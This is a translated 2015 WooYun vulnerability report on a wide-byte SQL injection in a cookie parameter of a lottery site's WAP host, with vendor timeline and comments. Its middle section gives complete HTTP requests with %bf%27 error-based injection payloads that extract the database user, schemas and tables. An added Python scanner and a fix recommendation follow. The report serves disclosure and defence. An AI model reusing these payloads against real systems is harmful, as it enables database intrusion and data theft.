
Vulnerability summary

Defect ID: wooyun-2015-0110248

Title: Wide-byte SQL injection via Cookie on a 乐彩网 site

Vendor: 乐彩网

Author: 深度安全实验室

Submitted: 2015-04-26 13:30

Fixed: 2015-05-08 17:01

Published: 2015-05-08 17:01

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-26: Details sent to the vendor, awaiting vendor handling
2015-04-27: Vendor has confirmed; details disclosed to the vendor only
2015-05-07: Details disclosed to core white hats and relevant domain experts
2015-05-08: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public

Brief description:

Detailed description:

wap.17500.cn

Wide-byte injection:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

The injection point is the KmGZ_89fa_sid parameter in the cookie.

[screenshot: 1.jpg]


user: bbs@192.168.100.107


Next, the databases:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

[screenshot: 2.jpg]

Three databases:

information_schema
bbs
test


Retrieving the tables in the bbs database:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,table_name,0x5e5e5e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

[screenshot: 3.jpg]


378 tables, so I had Burp enumerate them:

[screenshot: 4.jpg]


Because GPC (magic_quotes_gpc) is on, the only way forward would be to pull out every column name and then guess which table each one belongs to; that is a bit of a hassle, so I left it there...
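An added example (not code from the report, the author, or the vendor) that models the two mechanisms this report turns on: a byte-level addslashes(), the escaping that GPC applies, followed by a GBK decode, which is why the %bf%27 prefix leaves a live quote behind, and a scan of the Cookie header for that byte pattern. The cookie sample is the report's first request with the injected value truncated; everything else is constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

def addslashes(raw: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def bare_quote_survives_gbk(raw: bytes) -> bool:
    """True if, after addslashes(), decoding as GBK leaves an unescaped quote.
    0xBF 0x5C is a valid GBK pair, so the backslash is swallowed into it."""
    text = addslashes(raw).decode("gbk", errors="replace")
    for m in re.finditer("'", text):
        before = text[:m.start()]
        if (len(before) - len(before.rstrip("\\"))) % 2 == 0:
            return True
    return False

# A GBK lead byte (0x81-0xFE) directly followed by a quote byte is never a
# valid character, so it is a high-confidence signal in any decoded value.
WIDE_BYTE_QUOTE = re.compile(rb"[\x81-\xfe]['\"]")
SQL_HINT = re.compile(rb"(?i)\b(select|union|information_schema|concat)\b")

def scan_cookie_header(header: str) -> list:
    """Return (cookie name, reason) pairs for values that look like wide-byte
    injection. Decode to raw bytes first: %bf%27 is what the server sees."""
    findings = []
    for item in header.split(";"):
        name, _, value = item.strip().partition("=")
        raw = unquote_to_bytes(value)
        if WIDE_BYTE_QUOTE.search(raw):
            findings.append((name, "wide-byte quote"))
        elif SQL_HINT.search(raw):
            findings.append((name, "sql keyword"))
    return findings

# Constructed sample: the report's first Cookie header with the injected
# value truncated after its opening, which is all the scan needs to see.
REPORT_COOKIE = ("PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; "
                 "KmGZ_89fa_saltkey=J4L14hLk; "
                 "KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*); "
                 "KmGZ_89fa_sendmail=1")

if __name__ == "__main__":
    print(bare_quote_survives_gbk(b"\xbf'"), bare_quote_survives_gbk(b"'"))
    print(scan_cookie_header(REPORT_COOKIE))
```

The durable fix is not more escaping: set the connection charset through the client library (mysqli_set_charset rather than a bare SET NAMES, so the escaper knows the charset) and bind cookie-derived values as query parameters.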

Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit 深度安全实验室@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-04-27 10:27

Vendor reply:

Thank you for the vulnerability information; we will handle it as soon as possible.

Latest status:

2015-05-08: Handled promptly


Vulnerability rating:

Comments

  1. 2015-04-27 00:11 | 明月影 ( Passerby | Rank:12 Vulns:8 | Learning techniques, learning approaches. )

    Following.

  2. 2015-07-26 16:04 | Eric_zZ ( Passerby | Rank:8 Vulns:5 | Just try it!)

    Could the author explain how you determined that the parameter in the cookie was open to wide-byte injection?